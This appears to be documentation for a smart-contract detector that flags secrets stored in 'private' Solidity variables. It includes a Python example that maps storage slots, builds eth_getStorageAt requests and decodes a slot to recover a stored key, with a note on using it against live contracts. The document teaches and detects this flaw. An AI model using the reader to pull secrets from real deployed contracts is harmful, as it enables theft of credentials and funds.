Private Data Exposure
Detects contracts storing sensitive data in private or internal state variables, which remain readable on-chain despite the visibility modifier.
Overview
The private data detector identifies contracts that store sensitive information (passwords, secret keys, private configuration) in state variables marked as private or internal. On the EVM, every storage slot of every contract is publicly readable with the eth_getStorageAt JSON-RPC call, regardless of the Solidity visibility modifier. private and internal are compile-time rules: they stop other Solidity code from referencing the variable and suppress the generated getter. They provide no confidentiality for the value itself.
Why This Is an Issue
Developers sometimes store API keys, passwords, or access control secrets in private variables, assuming they are hidden. Any observer can read these values directly from storage, bypassing the Solidity visibility restriction entirely. A secret passed to the constructor is additionally visible in the input data of the deployment transaction, so removing the variable later does not undo the exposure.
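To make the exposure concrete, the following is an added example in Python (not Sigvex code and not from the original page). It computes the storage layout of a small constructed contract, builds the eth_getStorageAt request that any public node will answer without credentials, and decodes the returned 32-byte word the way an attacker would: as a raw value, as an integer, and as a Solidity short string. The contract, RPC URL and address are placeholders.

```python
"""Read a 'private' Solidity state variable straight out of contract storage.

Added example, not Sigvex's code. The target is a constructed contract:

    contract Vault {
        address public owner;        // slot 0, bytes 0..19
        bool    private initialized; // slot 0, byte 20 (packed with owner)
        uint256 private counter;     // slot 1
        string  private apiKey;      // slot 2 (short string, <= 31 bytes)
    }

RPC_URL and CONTRACT below are placeholders, not real endpoints or deployments.
"""
import json
import urllib.request

WORD = 32  # width of an EVM storage slot in bytes
RPC_URL = "http://127.0.0.1:8545"               # placeholder node
CONTRACT = "0x" + "ab" * 20                     # placeholder address


def assign_slots(variables):
    """Map value-type state variables, declared in order as (name, byte_size),
    to (slot, byte_offset) using Solidity's packing rule: a variable shares the
    current slot if it still fits, otherwise it starts a new slot. string/bytes
    and mappings take a whole 32-byte slot themselves, so pass size 32."""
    layout, slot, offset = {}, 0, 0
    for name, size in variables:
        if size > WORD:
            raise ValueError(f"{name}: a single variable is at most 32 bytes")
        if offset + size > WORD:          # does not fit: move to the next slot
            slot, offset = slot + 1, 0
        layout[name] = (slot, offset)
        offset += size
        if offset == WORD:                # slot full: next variable starts fresh
            slot, offset = slot + 1, 0
    return layout


def storage_request(address, slot, block="latest", req_id=1):
    """JSON-RPC payload for eth_getStorageAt. Slot is a QUANTITY (hex, no padding)."""
    return {"jsonrpc": "2.0", "id": req_id, "method": "eth_getStorageAt",
            "params": [address, hex(slot), block]}


def fetch_slot(rpc_url, address, slot):
    """POST the request to a node and return the slot as 32 bytes (network call)."""
    body = json.dumps(storage_request(address, slot)).encode()
    req = urllib.request.Request(rpc_url, data=body,
                                 headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(req, timeout=10) as resp:
        result = json.load(resp)["result"]
    return bytes.fromhex(result[2:].rjust(2 * WORD, "0"))


def encode_short_string(s):
    """Solidity layout of a string of at most 31 bytes: data left-aligned in the
    slot, lowest byte = 2 * length (even, which marks the short form). Used here
    to construct a sample word; long strings store 2*len+1 and keep the bytes at
    keccak256(slot) instead."""
    data = s.encode()
    if len(data) > 31:
        raise ValueError("long strings do not keep their bytes in the slot")
    return data + b"\x00" * (31 - len(data)) + bytes([2 * len(data)])


def decode_storage_word(word):
    """Interpret a raw slot as the shapes a stored secret usually takes."""
    out = {"hex": "0x" + word.hex(), "uint": int.from_bytes(word, "big")}
    low = word[-1]
    if low % 2 == 0 and low // 2 <= 31:           # candidate short string
        length = low // 2
        if word[length:-1] == b"\x00" * (31 - length):   # padding must be zero
            try:
                out["short_string"] = word[:length].decode()
            except UnicodeDecodeError:
                pass                               # just bytes that look like one
    return out


if __name__ == "__main__":
    layout = assign_slots([("owner", 20), ("initialized", 1),
                           ("counter", 32), ("apiKey", 32)])
    print("layout:", layout)
    slot = layout["apiKey"][0]
    print("request:", json.dumps(storage_request(CONTRACT, slot)))
    # Constructed sample word standing in for what fetch_slot would return.
    word = encode_short_string("correct horse battery")
    print("decoded:", decode_storage_word(word))
```

Against a live contract, replace the constructed word with fetch_slot(RPC_URL, CONTRACT, slot); the decoder and the request shape are unchanged. The same request works against archive nodes with a historical block tag, so rotating a leaked secret to a new value does not hide the old one.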
Detection Methodology
- Storage slot analysis: Identifies storage variables from SLOAD/SSTORE patterns.
- Value classification: Uses heuristics to classify stored values as potentially sensitive (constant-length hashes, encoded strings, values set only in constructor).
- Access pattern analysis: Flags variables that are written once (initialization) and only read in comparison operations (password check pattern).
Examples
Sample Sigvex Output
{
  "detector_id": "private-data",
  "severity": "low",
  "confidence": 0.65,
  "description": "Storage slot 2 is written once in the constructor and compared against function input in authenticate(). This pattern suggests a stored secret used for authentication, which is publicly readable via eth_getStorageAt.",
  "location": { "function": "authenticate(bytes32)", "offset": 44 }
}
Related Detectors
- Access Control — access control issues
- Weak Randomness — predictable values